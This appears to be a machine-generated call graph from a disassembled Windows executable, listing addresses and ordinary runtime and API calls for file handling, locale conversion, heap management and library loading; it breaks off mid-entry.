7ff7e531a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19358->19359 19373 7ff7e5322316 19359->19373 19360->19360 19396 7ff7e532266c 19360->19396 19363 7ff7e532243a 19364 7ff7e5314f08 _set_fmode 11 API calls 19363->19364 19365 7ff7e532243f 19364->19365 19369 7ff7e531a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19365->19369 19366 7ff7e5322454 19367 7ff7e5322495 19366->19367 19370 7ff7e531a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19366->19370 19368 7ff7e53224fc 19367->19368 19407 7ff7e5321df4 19367->19407 19372 7ff7e531a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19368->19372 19369->19373 19370->19367 19372->19373 19373->19330 19375 7ff7e5322557 19374->19375 19376 7ff7e5322561 19375->19376 19422 7ff7e53202d8 EnterCriticalSection 19375->19422 19380 7ff7e53225d3 19376->19380 19382 7ff7e531a504 __GetCurrentState 45 API calls 19376->19382 19380->19353 19384 7ff7e53225eb 19382->19384 19383 7ff7e5322642 19383->19353 19384->19383 19386 7ff7e531b224 50 API calls 19384->19386 19387 7ff7e532262c 19386->19387 19388 7ff7e53222c4 65 API calls 19387->19388 19388->19383 19390 7ff7e5314f4c 45 API calls 19389->19390 19391 7ff7e5321fd8 19390->19391 19392 7ff7e5321fe4 GetOEMCP 19391->19392 19393 7ff7e5321ff6 19391->19393 19394 7ff7e532200b 19392->19394 19393->19394 19395 7ff7e5321ffb GetACP 19393->19395 19394->19356 19394->19373 19395->19394 19397 7ff7e5321fc4 47 API calls 19396->19397 19399 7ff7e5322699 19397->19399 19398 7ff7e53227ef 19402 7ff7e530c550 _log10_special 8 API calls 19398->19402 19399->19398 19400 7ff7e53226f0 memcpy_s 19399->19400 19401 7ff7e53226d6 IsValidCodePage 19399->19401 19423 7ff7e53220dc 19400->19423 19401->19398 19403 7ff7e53226e7 19401->19403 19404 7ff7e5322431 19402->19404 19403->19400 19405 7ff7e5322716 GetCPInfo 19403->19405 19404->19363 19404->19366 19405->19398 19405->19400 19479 7ff7e53202d8 EnterCriticalSection 19407->19479 19424 7ff7e5322119 GetCPInfo 19423->19424 19425 7ff7e532220f 19423->19425 19424->19425 19431 7ff7e532212c 19424->19431 19426 7ff7e530c550 _log10_special 8 API calls 19425->19426 19428 7ff7e53222ae 19426->19428 19427 7ff7e5322e40 48 API calls 19429 7ff7e53221a3 19427->19429 19428->19398 19434 7ff7e5327b84 19429->19434 19431->19427 19433 7ff7e5327b84 54 API calls 19433->19425 19435 7ff7e5314f4c 45 API calls 19434->19435 19436 7ff7e5327ba9 19435->19436 19439 7ff7e5327850 19436->19439 19440 7ff7e5327891 19439->19440 19441 7ff7e531f8a0 _fread_nolock MultiByteToWideChar 19440->19441 19445 7ff7e53278db 19441->19445 19442 7ff7e5327b59 19443 7ff7e530c550 _log10_special 8 API calls 19442->19443 19444 7ff7e53221d6 19443->19444 19444->19433 19445->19442 19446 7ff7e531d5fc _fread_nolock 12 API calls 19445->19446 19447 7ff7e5327a11 19445->19447 19448 7ff7e5327913 19445->19448 19446->19448 19447->19442 19449 7ff7e531a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19447->19449 19448->19447 19450 7ff7e531f8a0 _fread_nolock MultiByteToWideChar 19448->19450 19449->19442 19451 7ff7e5327986 19450->19451 19451->19447 19470 7ff7e531f0e4 19451->19470 19454 7ff7e5327a22 19457 7ff7e531d5fc _fread_nolock 12 API calls 19454->19457 19458 7ff7e5327af4 19454->19458 19460 7ff7e5327a40 19454->19460 19455 7ff7e53279d1 19455->19447 19456 7ff7e531f0e4 __crtLCMapStringW 6 API calls 19455->19456 19456->19447 19457->19460 19458->19447 19459 7ff7e531a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19458->19459 19459->19447 19460->19447 19461 7ff7e531f0e4 __crtLCMapStringW 6 API calls 19460->19461 19462 7ff7e5327ac0 19461->19462 19462->19458 19463 7ff7e5327ae0 19462->19463 19464 7ff7e5327af6 19462->19464 19465 7ff7e53207e8 WideCharToMultiByte 19463->19465 19466 7ff7e53207e8 WideCharToMultiByte 19464->19466 19467 7ff7e5327aee 19465->19467 19466->19467 19467->19458 19468 7ff7e5327b0e 19467->19468 19468->19447 19469 7ff7e531a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19468->19469 19469->19447 19471 7ff7e531ed10 __crtLCMapStringW 5 API calls 19470->19471 19472 7ff7e531f122 19471->19472 19473 7ff7e531f12a 19472->19473 19476 7ff7e531f1d0 19472->19476 19473->19447 19473->19454 19473->19455 19475 7ff7e531f193 LCMapStringW 19475->19473 19477 7ff7e531ed10 __crtLCMapStringW 5 API calls 19476->19477 19478 7ff7e531f1fe __crtLCMapStringW 19477->19478 19478->19475 20314 7ff7e531c520 20325 7ff7e53202d8 EnterCriticalSection 20314->20325 15918 7ff7e5315628 15919 7ff7e531565f 15918->15919 15920 7ff7e5315642 15918->15920 15919->15920 15922 7ff7e5315672 CreateFileW 15919->15922 15969 7ff7e5314ee8 15920->15969 15924 7ff7e53156dc 15922->15924 15925 7ff7e53156a6 15922->15925 15978 7ff7e5315c04 15924->15978 15943 7ff7e531577c GetFileType 15925->15943 15932 7ff7e53156bb CloseHandle 15937 7ff7e531565a 15932->15937 15933 7ff7e53156d1 CloseHandle 15933->15937 15934 7ff7e5315710 16004 7ff7e53159c4 15934->16004 15935 7ff7e53156e5 15999 7ff7e5314e7c 15935->15999 15942 7ff7e53156ef 15942->15937 15944 7ff7e5315887 15943->15944 15945 7ff7e53157ca 15943->15945 15947 7ff7e531588f 15944->15947 15948 7ff7e53158b1 15944->15948 15946 7ff7e53157f6 GetFileInformationByHandle 15945->15946 15950 7ff7e5315b00 21 API calls 15945->15950 15951 7ff7e531581f 15946->15951 15952 7ff7e53158a2 GetLastError 15946->15952 15947->15952 15953 7ff7e5315893 15947->15953 15949 7ff7e53158d4 PeekNamedPipe 15948->15949 15959 7ff7e5315872 15948->15959 15949->15959 15955 7ff7e53157e4 15950->15955 15956 7ff7e53159c4 51 API calls 15951->15956 15954 7ff7e5314e7c _fread_nolock 11 API calls 15952->15954 15957 7ff7e5314f08 _set_fmode 11 API calls 15953->15957 15954->15959 15955->15946 15955->15959 15958 7ff7e531582a 15956->15958 15957->15959 16021 7ff7e5315924 15958->16021 16028 7ff7e530c550 15959->16028 15964 7ff7e5315924 10 API calls 15965 7ff7e5315849 15964->15965 15966 7ff7e5315924 10 API calls 15965->15966 15967 7ff7e531585a 15966->15967 15967->15959 15968 7ff7e5314f08 _set_fmode 11 API calls 15967->15968 15968->15959 16042 7ff7e531b2c8 GetLastError 15969->16042 15971 7ff7e5314ef1 15972 7ff7e5314f08 15971->15972 15973 7ff7e531b2c8 _set_fmode 11 API calls 15972->15973 15974 7ff7e5314f11 15973->15974 15975 7ff7e531a8e0 15974->15975 16100 7ff7e531a778 15975->16100 15977 7ff7e531a8f9 15977->15937 15979 7ff7e5315c3a 15978->15979 15980 7ff7e5314f08 _set_fmode 11 API calls 15979->15980 15998 7ff7e5315cd2 __std_exception_copy 15979->15998 15982 7ff7e5315c4c 15980->15982 15981 7ff7e530c550 _log10_special 8 API calls 15983 7ff7e53156e1 15981->15983 15984 7ff7e5314f08 _set_fmode 11 API calls 15982->15984 15983->15934 15983->15935 15985 7ff7e5315c54 15984->15985 16152 7ff7e5317e08 15985->16152 15987 7ff7e5315c69 15988 7ff7e5315c7b 15987->15988 15989 7ff7e5315c71 15987->15989 15991 7ff7e5314f08 _set_fmode 11 API calls 15988->15991 15990 7ff7e5314f08 _set_fmode 11 API calls 15989->15990 15995 7ff7e5315c76 15990->15995 15992 7ff7e5315c80 15991->15992 15993 7ff7e5314f08 _set_fmode 11 API calls 15992->15993 15992->15998 15994 7ff7e5315c8a 15993->15994 15996 7ff7e5317e08 45 API calls 15994->15996 15997 7ff7e5315cc4 GetDriveTypeW 15995->15997 15995->15998 15996->15995 15997->15998 15998->15981 16000 7ff7e531b2c8 _set_fmode 11 API calls 15999->16000 16001 7ff7e5314e89 Concurrency::details::SchedulerProxy::DeleteThis 16000->16001 16002 7ff7e531b2c8 _set_fmode 11 API calls 16001->16002 16003 7ff7e5314eab 16002->16003 16003->15942 16005 7ff7e53159ec 16004->16005 16013 7ff7e531571d 16005->16013 16246 7ff7e531f724 16005->16246 16007 7ff7e5315a80 16008 7ff7e531f724 51 API calls 16007->16008 16007->16013 16009 7ff7e5315a93 16008->16009 16010 7ff7e531f724 51 API calls 16009->16010 16009->16013 16011 7ff7e5315aa6 16010->16011 16012 7ff7e531f724 51 API calls 16011->16012 16011->16013 16012->16013 16014 7ff7e5315b00 16013->16014 16015 7ff7e5315b1a 16014->16015 16016 7ff7e5315b51 16015->16016 16017 7ff7e5315b2a 16015->16017 16019 7ff7e531f5b8 21 API calls 16016->16019 16018 7ff7e5315b3a 16017->16018 16020 7ff7e5314e7c _fread_nolock 11 API calls 16017->16020 16018->15942 16019->16018 16020->16018 16022 7ff7e531594d FileTimeToSystemTime 16021->16022 16023 7ff7e5315940 16021->16023 16024 7ff7e5315961 SystemTimeToTzSpecificLocalTime 16022->16024 16025 7ff7e5315948 16022->16025 16023->16022 16023->16025 16024->16025 16026 7ff7e530c550 _log10_special 8 API calls 16025->16026 16027 7ff7e5315839 16026->16027 16027->15964 16029 7ff7e530c559 16028->16029 16030 7ff7e530c564 16029->16030 16031 7ff7e530c8e0 IsProcessorFeaturePresent 16029->16031 16030->15932 16030->15933 16032 7ff7e530c8f8 16031->16032 16037 7ff7e530cad8 RtlCaptureContext 16032->16037 16038 7ff7e530caf2 RtlLookupFunctionEntry 16037->16038 16039 7ff7e530cb08 RtlVirtualUnwind 16038->16039 16040 7ff7e530c90b 16038->16040 16039->16038 16039->16040 16041 7ff7e530c8a0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 16040->16041 16043 7ff7e531b309 FlsSetValue 16042->16043 16045 7ff7e531b2ec 16042->16045 16044 7ff7e531b31b 16043->16044 16057 7ff7e531b2f9 SetLastError 16043->16057 16059 7ff7e531eb98 16044->16059 16045->16043 16045->16057 16049 7ff7e531b348 FlsSetValue 16052 7ff7e531b354 FlsSetValue 16049->16052 16053 7ff7e531b366 16049->16053 16050 7ff7e531b338 FlsSetValue 16051 7ff7e531b341 16050->16051 16066 7ff7e531a948 16051->16066 16052->16051 16072 7ff7e531aef4 16053->16072 16057->15971 16064 7ff7e531eba9 _set_fmode 16059->16064 16060 7ff7e531ebfa 16063 7ff7e5314f08 _set_fmode 10 API calls 16060->16063 16061 7ff7e531ebde HeapAlloc 16062 7ff7e531b32a 16061->16062 16061->16064 16062->16049 16062->16050 16063->16062 16064->16060 16064->16061 16077 7ff7e5323590 16064->16077 16067 7ff7e531a94d RtlFreeHeap 16066->16067 16068 7ff7e531a97c 16066->16068 16067->16068 16069 7ff7e531a968 GetLastError 16067->16069 16068->16057 16070 7ff7e531a975 Concurrency::details::SchedulerProxy::DeleteThis 16069->16070 16071 7ff7e5314f08 _set_fmode 9 API calls 16070->16071 16071->16068 16086 7ff7e531adcc 16072->16086 16080 7ff7e53235d0 16077->16080 16085 7ff7e53202d8 EnterCriticalSection 16080->16085 16098 7ff7e53202d8 EnterCriticalSection 16086->16098 16101 7ff7e531a7a3 16100->16101 16104 7ff7e531a814 16101->16104 16103 7ff7e531a7ca 16103->15977 16114 7ff7e531a55c 16104->16114 16107 7ff7e531a84f 16107->16103 16115 7ff7e531a578 GetLastError 16114->16115 16116 7ff7e531a5b3 16114->16116 16117 7ff7e531a588 16115->16117 16116->16107 16120 7ff7e531a5c8 16116->16120 16127 7ff7e531b390 16117->16127 16121 7ff7e531a5fc 16120->16121 16122 7ff7e531a5e4 GetLastError SetLastError 16120->16122 16121->16107 16123 7ff7e531a900 IsProcessorFeaturePresent 16121->16123 16122->16121 16124 7ff7e531a913 16123->16124 16144 7ff7e531a614 16124->16144 16128 7ff7e531b3ca FlsSetValue 16127->16128 16129 7ff7e531b3af FlsGetValue 16127->16129 16131 7ff7e531b3d7 16128->16131 16132 7ff7e531a5a3 SetLastError 16128->16132 16130 7ff7e531b3c4 16129->16130 16129->16132 16130->16128 16133 7ff7e531eb98 _set_fmode 11 API calls 16131->16133 16132->16116 16134 7ff7e531b3e6 16133->16134 16135 7ff7e531b404 FlsSetValue 16134->16135 16136 7ff7e531b3f4 FlsSetValue 16134->16136 16138 7ff7e531b410 FlsSetValue 16135->16138 16139 7ff7e531b422 16135->16139 16137 7ff7e531b3fd 16136->16137 16140 7ff7e531a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16137->16140 16138->16137 16141 7ff7e531aef4 _set_fmode 11 API calls 16139->16141 16140->16132 16142 7ff7e531b42a 16141->16142 16143 7ff7e531a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16142->16143 16143->16132 16145 7ff7e531a64e __GetCurrentState memcpy_s 16144->16145 16146 7ff7e531a676 RtlCaptureContext RtlLookupFunctionEntry 16145->16146 16147 7ff7e531a6b0 RtlVirtualUnwind 16146->16147 16148 7ff7e531a6e6 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16146->16148 16147->16148 16149 7ff7e531a738 __GetCurrentState 16148->16149 16150 7ff7e530c550 _log10_special 8 API calls 16149->16150 16151 7ff7e531a757 GetCurrentProcess TerminateProcess 16150->16151 16153 7ff7e5317e92 16152->16153 16154 7ff7e5317e24 16152->16154 16189 7ff7e53207c0 16153->16189 16154->16153 16156 7ff7e5317e29 16154->16156 16157 7ff7e5317e5e 16156->16157 16158 7ff7e5317e41 16156->16158 16172 7ff7e5317c4c GetFullPathNameW 16157->16172 16164 7ff7e5317bd8 GetFullPathNameW 16158->16164 16163 7ff7e5317e56 __std_exception_copy 16163->15987 16165 7ff7e5317bfe GetLastError 16164->16165 16166 7ff7e5317c14 16164->16166 16167 7ff7e5314e7c _fread_nolock 11 API calls 16165->16167 16168 7ff7e5317c10 16166->16168 16170 7ff7e5314f08 _set_fmode 11 API calls 16166->16170 16169 7ff7e5317c0b 16167->16169 16168->16163 16171 7ff7e5314f08 _set_fmode 11 API calls 16169->16171 16170->16168 16171->16168 16173 7ff7e5317c7f GetLastError 16172->16173 16176 7ff7e5317c95 __std_exception_copy 16172->16176 16174 7ff7e5314e7c _fread_nolock 11 API calls 16173->16174 16175 7ff7e5317c8c 16174->16175 16177 7ff7e5314f08 _set_fmode 11 API calls 16175->16177 16178 7ff7e5317c91 16176->16178 16179 7ff7e5317cef GetFullPathNameW 16176->16179 16177->16178 16180 7ff7e5317d24 16178->16180 16179->16173 16179->16178 16184 7ff7e5317d98 memcpy_s 16180->16184 16185 7ff7e5317d4d memcpy_s 16180->16185 16181 7ff7e5317d81 16182 7ff7e5314f08 _set_fmode 11 API calls 16181->16182 16183 7ff7e5317d86 16182->16183 16187 7ff7e531a8e0 _invalid_parameter_noinfo 37 API calls 16183->16187 16184->16163 16185->16181 16185->16184 16186 7ff7e5317dba 16185->16186 16186->16184 16188 7ff7e5314f08 _set_fmode 11 API calls 16186->16188 16187->16184 16188->16183 16192 7ff7e53205d0 16189->16192 16193 7ff7e53205fb 16192->16193 16194 7ff7e5320612 16192->16194 16195 7ff7e5314f08 _set_fmode 11 API calls 16193->16195 16196 7ff7e5320637 16194->16196 16197 7ff7e5320616 16194->16197 16199 7ff7e5320600 16195->16199 16230 7ff7e531f5b8 16196->16230 16218 7ff7e532073c 16197->16218 16203 7ff7e531a8e0 _invalid_parameter_noinfo 37 API calls 16199->16203 16201 7ff7e532063c 16206 7ff7e53206e1 16201->16206 16207 7ff7e5320663 16201->16207 16217 7ff7e532060b __std_exception_copy 16203->16217 16204 7ff7e532061f 16205 7ff7e5314ee8 _fread_nolock 11 API calls 16204->16205 16208 7ff7e5320624 16205->16208 16206->16193 16210 7ff7e53206e9 16206->16210 16214 7ff7e5317c4c 14 API calls 16207->16214 16209 7ff7e5314f08 _set_fmode 11 API calls 16208->16209 16209->16199 16213 7ff7e5317bd8 13 API calls 16210->16213 16211 7ff7e530c550 _log10_special 8 API calls 16212 7ff7e5320731 16211->16212 16212->16163 16213->16217 16215 7ff7e53206a7 16214->16215 16216 7ff7e5317d24 37 API calls 16215->16216 16215->16217 16216->16217 16217->16211 16219 7ff7e5320786 16218->16219 16220 7ff7e5320756 16218->16220 16221 7ff7e5320771 16219->16221 16222 7ff7e5320791 GetDriveTypeW 16219->16222 16223 7ff7e5314ee8 _fread_nolock 11 API calls 16220->16223 16226 7ff7e530c550 _log10_special 8 API calls 16221->16226 16222->16221 16224 7ff7e532075b 16223->16224 16225 7ff7e5314f08 _set_fmode 11 API calls 16224->16225 16227 7ff7e5320766 16225->16227 16228 7ff7e532061b 16226->16228 16229 7ff7e531a8e0 _invalid_parameter_noinfo 37 API calls 16227->16229 16228->16201 16228->16204 16229->16221 16244 7ff7e532a4d0 16230->16244 16232 7ff7e531f5ee GetCurrentDirectoryW 16233 7ff7e531f62c 16232->16233 16234 7ff7e531f605 16232->16234 16235 7ff7e531eb98 _set_fmode 11 API calls 16233->16235 16236 7ff7e530c550 _log10_special 8 API calls 16234->16236 16237 7ff7e531f63b 16235->16237 16238 7ff7e531f699 16236->16238 16239 7ff7e531f654 16237->16239 16240 7ff7e531f645 GetCurrentDirectoryW 16237->16240 16238->16201 16241 7ff7e5314f08 _set_fmode 11 API calls 16239->16241 16240->16239 16242 7ff7e531f659 16240->16242 16241->16242 16243 7ff7e531a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16242->16243 16243->16234 16245 7ff7e532a4c0 16244->16245 16245->16232 16245->16245 16247 7ff7e531f755 16246->16247 16248 7ff7e531f731 16246->16248 16250 7ff7e531f78f 16247->16250 16253 7ff7e531f7ae 16247->16253 16248->16247 16249 7ff7e531f736 16248->16249 16251 7ff7e5314f08 _set_fmode 11 API calls 16249->16251 16252 7ff7e5314f08 _set_fmode 11 API calls 16250->16252 16254 7ff7e531f73b 16251->16254 16255 7ff7e531f794 16252->16255 16263 7ff7e5314f4c 16253->16263 16257 7ff7e531a8e0 _invalid_parameter_noinfo 37 API calls 16254->16257 16258 7ff7e531a8e0 _invalid_parameter_noinfo 37 API calls 16255->16258 16259 7ff7e531f746 16257->16259 16261 7ff7e531f79f 16258->16261 16259->16007 16260 7ff7e531f7bb 16260->16261 16262 7ff7e53204dc 51 API calls 16260->16262 16261->16007 16262->16260 16264 7ff7e5314f6b 16263->16264 16265 7ff7e5314f70 16263->16265 16264->16260 16265->16264 16271 7ff7e531b150 GetLastError 16265->16271 16272 7ff7e531b191 FlsSetValue 16271->16272 16273 7ff7e531b174 FlsGetValue 16271->16273 16275 7ff7e531b1a3 16272->16275 16291 7ff7e531b181 16272->16291 16274 7ff7e531b18b 16273->16274 16273->16291 16274->16272 16277 7ff7e531eb98 _set_fmode 11 API calls 16275->16277 16276 7ff7e531b1fd SetLastError 16278 7ff7e5314f8b 16276->16278 16279 7ff7e531b21d 16276->16279 16280 7ff7e531b1b2 16277->16280 16293 7ff7e531d984 16278->16293 16301 7ff7e531a504 16279->16301 16282 7ff7e531b1d0 FlsSetValue 16280->16282 16283 7ff7e531b1c0 FlsSetValue 16280->16283 16286 7ff7e531b1dc FlsSetValue 16282->16286 16287 7ff7e531b1ee 16282->16287 16285 7ff7e531b1c9 16283->16285 16288 7ff7e531a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16285->16288 16286->16285 16289 7ff7e531aef4 _set_fmode 11 API calls 16287->16289 16288->16291 16290 7ff7e531b1f6 16289->16290 16292 7ff7e531a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16290->16292 16291->16276 16292->16276 16294 7ff7e531d999 16293->16294 16295 7ff7e5314fae 16293->16295 16294->16295 16345 7ff7e5323304 16294->16345 16297 7ff7e531d9f0 16295->16297 16298 7ff7e531da18 16297->16298 16299 7ff7e531da05 16297->16299 16298->16264 16299->16298 16358 7ff7e5322650 16299->16358 16310 7ff7e5323650 16301->16310 16336 7ff7e5323608 16310->16336 16341 7ff7e53202d8 EnterCriticalSection 16336->16341 16346 7ff7e531b150 __GetCurrentState 45 API calls 16345->16346 16347 7ff7e5323313 16346->16347 16348 7ff7e532335e 16347->16348 16357 7ff7e53202d8 EnterCriticalSection 16347->16357 16348->16295 16359 7ff7e531b150 __GetCurrentState 45 API calls 16358->16359 16360 7ff7e5322659 16359->16360 19669 7ff7e53216b0 19680 7ff7e53273e4 19669->19680 19682 7ff7e53273f1 19680->19682 19681 7ff7e531a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19681->19682 19682->19681 19683 7ff7e532740d 19682->19683 19684 7ff7e531a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19683->19684 19685 7ff7e53216b9 19683->19685 19684->19683 19686 7ff7e53202d8 EnterCriticalSection 19685->19686 16416 7ff7e530cc3c 16437 7ff7e530ce0c 16416->16437 16419 7ff7e530cd88 16591 7ff7e530d12c IsProcessorFeaturePresent 16419->16591 16420 7ff7e530cc58 __scrt_acquire_startup_lock 16422 7ff7e530cd92 16420->16422 16429 7ff7e530cc76 __scrt_release_startup_lock 16420->16429 16423 7ff7e530d12c 7 API calls 16422->16423 16425 7ff7e530cd9d __GetCurrentState 16423->16425 16424 7ff7e530cc9b 16426 7ff7e530cd21 16443 7ff7e530d274 16426->16443 16428 7ff7e530cd26 16446 7ff7e5301000 16428->16446 16429->16424 16429->16426 16580 7ff7e5319b2c 16429->16580 16434 7ff7e530cd49 16434->16425 16587 7ff7e530cf90 16434->16587 16438 7ff7e530ce14 16437->16438 16439 7ff7e530ce20 __scrt_dllmain_crt_thread_attach 16438->16439 16440 7ff7e530cc50 16439->16440 16441 7ff7e530ce2d 16439->16441 16440->16419 16440->16420 16441->16440 16598 7ff7e530d888 16441->16598 16444 7ff7e532a4d0 memcpy_s 16443->16444 16445 7ff7e530d28b GetStartupInfoW 16444->16445 16445->16428 16447 7ff7e5301009 16446->16447 16625 7ff7e5315484 16447->16625 16449 7ff7e53037fb 16632 7ff7e53036b0 16449->16632 16452 7ff7e5303808 __std_exception_copy 16454 7ff7e530c550 _log10_special 8 API calls 16452->16454 16456 7ff7e5303ca7 16454->16456 16585 7ff7e530d2b8 GetModuleHandleW 16456->16585 16457 7ff7e530383c 16792 7ff7e5301c80 16457->16792 16458 7ff7e530391b 16801 7ff7e53045c0 16458->16801 16462 7ff7e530385b 16704 7ff7e5308830 16462->16704 16464 7ff7e530396a 16824 7ff7e5302710 16464->16824 16465 7ff7e530388e 16475 7ff7e53038bb __std_exception_copy 16465->16475 16796 7ff7e53089a0 16465->16796 16468 7ff7e530395d 16469 7ff7e5303984 16468->16469 16470 7ff7e5303962 16468->16470 16471 7ff7e5301c80 49 API calls 16469->16471 16820 7ff7e531004c 16470->16820 16474 7ff7e53039a3 16471->16474 16479 7ff7e5301950 115 API calls 16474->16479 16476 7ff7e5308830 14 API calls 16475->16476 16485 7ff7e53038de __std_exception_copy 16475->16485 16476->16485 16478 7ff7e5303a0b 16480 7ff7e53089a0 40 API calls 16478->16480 16481 7ff7e53039ce 16479->16481 16482 7ff7e5303a17 16480->16482 16481->16462 16484 7ff7e53039de 16481->16484 16483 7ff7e53089a0 40 API calls 16482->16483 16486 7ff7e5303a23 16483->16486 16487 7ff7e5302710 54 API calls 16484->16487 16489 7ff7e530390e __std_exception_copy 16485->16489 16835 7ff7e5308940 16485->16835 16488 7ff7e53089a0 40 API calls 16486->16488 16487->16452 16488->16489 16490 7ff7e5308830 14 API calls 16489->16490 16491 7ff7e5303a3b 16490->16491 16492 7ff7e5303b2f 16491->16492 16493 7ff7e5303a60 __std_exception_copy 16491->16493 16494 7ff7e5302710 54 API calls 16492->16494 16495 7ff7e5308940 40 API calls 16493->16495 16497 7ff7e5303aab 16493->16497 16494->16452 16495->16497 16496 7ff7e5308830 14 API calls 16498 7ff7e5303bf4 __std_exception_copy 16496->16498 16497->16496 16499 7ff7e5303c46 16498->16499 16500 7ff7e5303d41 16498->16500 16501 7ff7e5303cd4 16499->16501 16502 7ff7e5303c50 16499->16502 16842 7ff7e53044e0 16500->16842 16505 7ff7e5308830 14 API calls 16501->16505 16717 7ff7e53090e0 16502->16717 16508 7ff7e5303ce0 16505->16508 16506 7ff7e5303d4f 16509 7ff7e5303d65 16506->16509 16510 7ff7e5303d71 16506->16510 16513 7ff7e5303c61 16508->16513 16514 7ff7e5303ced 16508->16514 16845 7ff7e5304630 16509->16845 16512 7ff7e5301c80 49 API calls 16510->16512 16523 7ff7e5303cc8 __std_exception_copy 16512->16523 16516 7ff7e5302710 54 API calls 16513->16516 16517 7ff7e5301c80 49 API calls 16514->16517 16516->16452 16520 7ff7e5303d0b 16517->16520 16518 7ff7e5303dc4 16767 7ff7e5309390 16518->16767 16522 7ff7e5303d12 16520->16522 16520->16523 16526 7ff7e5302710 54 API calls 16522->16526 16523->16518 16524 7ff7e5303da7 SetDllDirectoryW LoadLibraryExW 16523->16524 16524->16518 16525 7ff7e5303dd7 SetDllDirectoryW 16528 7ff7e5303e0a 16525->16528 16569 7ff7e5303e5a 16525->16569 16526->16452 16530 7ff7e5308830 14 API calls 16528->16530 16529 7ff7e5304008 16532 7ff7e5304035 16529->16532 16533 7ff7e5304012 PostMessageW GetMessageW 16529->16533 16537 7ff7e5303e16 __std_exception_copy 16530->16537 16531 7ff7e5303f1b 16772 7ff7e53033c0 16531->16772 16922 7ff7e5303360 16532->16922 16533->16532 16539 7ff7e5303ef2 16537->16539 16543 7ff7e5303e4e 16537->16543 16542 7ff7e5308940 40 API calls 16539->16542 16542->16569 16543->16569 16848 7ff7e5306dc0 16543->16848 16549 7ff7e5306fc0 FreeLibrary 16551 7ff7e530405b 16549->16551 16557 7ff7e5303e81 16560 7ff7e5303ea2 16557->16560 16571 7ff7e5303e85 16557->16571 16869 7ff7e5306e00 16557->16869 16560->16571 16888 7ff7e53071b0 16560->16888 16569->16529 16569->16531 16571->16569 16904 7ff7e5302a50 16571->16904 16581 7ff7e5319b64 16580->16581 16582 7ff7e5319b43 16580->16582 18887 7ff7e531a3d8 16581->18887 16582->16426 16586 7ff7e530d2c9 16585->16586 16586->16434 16589 7ff7e530cfa1 16587->16589 16588 7ff7e530cd60 16588->16424 16589->16588 16590 7ff7e530d888 7 API calls 16589->16590 16590->16588 16592 7ff7e530d152 __GetCurrentState memcpy_s 16591->16592 16593 7ff7e530d171 RtlCaptureContext RtlLookupFunctionEntry 16592->16593 16594 7ff7e530d19a RtlVirtualUnwind 16593->16594 16595 7ff7e530d1d6 memcpy_s 16593->16595 16594->16595 16596 7ff7e530d208 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16595->16596 16597 7ff7e530d256 __GetCurrentState 16596->16597 16597->16422 16599 7ff7e530d89a 16598->16599 16600 7ff7e530d890 16598->16600 16599->16440 16604 7ff7e530dc24 16600->16604 16605 7ff7e530dc33 16604->16605 16607 7ff7e530d895 16604->16607 16612 7ff7e530de60 16605->16612 16608 7ff7e530dc90 16607->16608 16609 7ff7e530dcbb 16608->16609 16610 7ff7e530dc9e DeleteCriticalSection 16609->16610 16611 7ff7e530dcbf 16609->16611 16610->16609 16611->16599 16616 7ff7e530dcc8 16612->16616 16617 7ff7e530ddb2 TlsFree 16616->16617 16623 7ff7e530dd0c __vcrt_FlsAlloc 16616->16623 16618 7ff7e530dd3a LoadLibraryExW 16620 7ff7e530ddd9 16618->16620 16621 7ff7e530dd5b GetLastError 16618->16621 16619 7ff7e530ddf9 GetProcAddress 16619->16617 16620->16619 16622 7ff7e530ddf0 FreeLibrary 16620->16622 16621->16623 16622->16619 16623->16617 16623->16618 16623->16619 16624 7ff7e530dd7d LoadLibraryExW 16623->16624 16624->16620 16624->16623 16626 7ff7e531f480 16625->16626 16628 7ff7e531f526 16626->16628 16629 7ff7e531f4d3 16626->16629 16627 7ff7e531a814 _invalid_parameter_noinfo 37 API calls 16631 7ff7e531f4fc 16627->16631 16935 7ff7e531f358 16628->16935 16629->16627 16631->16449 16943 7ff7e530c850 16632->16943 16635 7ff7e5303710 16945 7ff7e5309280 FindFirstFileExW 16635->16945 16636 7ff7e53036eb GetLastError 16950 7ff7e5302c50 16636->16950 16640 7ff7e5303706 16643 7ff7e530c550 _log10_special 8 API calls 16640->16643 16641 7ff7e5303723 16965 7ff7e5309300 CreateFileW 16641->16965 16642 7ff7e530377d 16976 7ff7e5309440 16642->16976 16646 7ff7e53037b5 16643->16646 16646->16452 16654 7ff7e5301950 16646->16654 16648 7ff7e530378b 16648->16640 16651 7ff7e5302810 49 API calls 16648->16651 16649 7ff7e5303734 16968 7ff7e5302810 16649->16968 16650 7ff7e530374c __vcrt_FlsAlloc 16650->16642 16651->16640 16655 7ff7e53045c0 108 API calls 16654->16655 16656 7ff7e5301985 16655->16656 16657 7ff7e5301c43 16656->16657 16659 7ff7e5307f90 83 API calls 16656->16659 16658 7ff7e530c550 _log10_special 8 API calls 16657->16658 16661 7ff7e5301c5e 16658->16661 16660 7ff7e53019cb 16659->16660 16703 7ff7e5301a03 16660->16703 17340 7ff7e53106d4 16660->17340 16661->16457 16661->16458 16663 7ff7e531004c 74 API calls 16663->16657 16664 7ff7e53019e5 16665 7ff7e53019e9 16664->16665 16666 7ff7e5301a08 16664->16666 16667 7ff7e5314f08 _set_fmode 11 API calls 16665->16667 17344 7ff7e531039c 16666->17344 16669 7ff7e53019ee 16667->16669 17347 7ff7e5302910 16669->17347 16672 7ff7e5301a26 16674 7ff7e5314f08 _set_fmode 11 API calls 16672->16674 16673 7ff7e5301a45 16676 7ff7e5301a5c 16673->16676 16677 7ff7e5301a7b 16673->16677 16675 